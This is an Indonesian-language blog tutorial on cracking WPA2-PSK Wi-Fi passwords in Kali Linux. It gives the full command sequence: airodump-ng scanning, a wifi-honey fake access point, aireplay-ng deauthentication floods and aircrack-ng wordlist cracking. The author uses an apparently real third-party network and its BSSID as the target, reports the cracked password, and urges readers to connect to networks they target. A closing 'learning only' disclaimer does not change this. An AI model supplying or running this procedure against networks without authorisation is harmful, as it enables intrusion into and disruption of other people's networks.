CARA HACK WIFI WPA2/PSK MENGGUNAKAN WIFI-HONEY , AIREPLAY & AIRCRACK DI KALI LINUX

ASSALLAMUALLAIKUM WR WB

Selamat pagi para blogger
kali ini gw mau memposting cara hack wifi wpa2/psk menggunakan wifi-honey yang jelas tools ini sudah tersedia di kali linux

oke langsung saja

Nyalakan interface mon0 anda dengan perintah
airmon-ng start wlan0
jika anda tidak mengetahui interface yang anda gunakan anda bisa menggunakan perintah
airmon-ng

contoh : wlan0 adalah interface yang gw gunakan


setelah itu cari target anda
masukan perintah : airodump-ng mon0


biarkan scaning hingga anda menemukan target
jika sudah mendapatkan target tekan CTRL + C untuk menghentikan proses scaning


buka wifi-honey
application > kali linux > wireless attack > 802.11 wireless tools > wifi-honey



atau dengan cara manual
buka terminal anda dan ketikan

wifi-honey -h setelah itu tekan "enter"
ket : -h artinya help dan itu untuk melihat perintah yang akan anda gunakan


masukan Ssid , Chanel dan interface yang anda gunakan
dengan perintah

wifi-honey namawifi 2 wlan0

contoh : wifi-honey POONAR 1 wlan0
ket : POONAR => nama wifi target
        1               => chanel wifi target
        wlan0        => interface yang gw


Selanjutnya biarkan wifi-honey berjalan

buka terminal baru dan masukan perintah berikut

aireplay-ng --deauth 10 -a BSSID:WIFI:TARGET:ANDA mon0 --ignore-negative-one

Contoh :
aireplay-ng --deauth 10 -a 30:B5:C2:F8:A2:78 mon0 --ignore-negative-one

Dan biarkan deauth berjalan hingga selesai

ket :
30:B5:C2:F8:A2:78 adalah BSSID wifi POONAR FUTSAL yang gw jadikan target


Ditahap ini Jalankan Aircrack untuk mencari password wifi tersebut

aircrack-ng -w /lokasiwordlistanda/wordlist.txt /lokasihasilcapture/capture.cap

contoh :
aircrack-ng -w /root/Rextor.txt /root/cap-01.cap

ket :
root adalah file home
Rextor.txt adalah nama wordlist gw
cap-01.cap adalah nama hasil capture dari wifi-honey



pilih yang mendapatkan handshake
di dalam kasus saya mendapatkan handshake POONAR FUTSAL di nomor 5

note : Jika belum mendapatkan handshake maka ada tanda 0 di setiap keterangan aircrack
         Dan sudah mendapatkan handshake ada tanda 1 di setiap keterangan aircrack
         tekan angka dimana letak handshake anda dan "enter"



Tunggu hingga mendapatkan password
tutup wifi-honey dengan cara CTRL + C

Password ditemukan apabila keterangan "KEY FOUND"

dan dalam kasus gw
password yang gw dapatkan 12345678



Dan silahkan di coba untuk konek ke wifi yang anda targetkan sebelumnya :D



Jika belum jelas bisa tonton video gw
sebelumnya mohon maaf karena di dalam video ada kekurangan dalam sebuah perintah aireplay
karena gw lupa masukin waktu itu :v



Oke sekian dari gw

Gw mohon maaf jika ada pemilik wifi yg mampir kesini & liat wifinya kena hack


JANGAN DISALAH GUNAKAN
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN
INI HANYA PEMBELAJARAN SEMATA

HACKING IS NOT CRIMINAL
HACKING IS ART

"the quieter you become , the more you are able to hear"

0 Response to "CARA HACK WIFI WPA2/PSK MENGGUNAKAN WIFI-HONEY , AIREPLAY & AIRCRACK DI KALI LINUX"

Post a Comment

.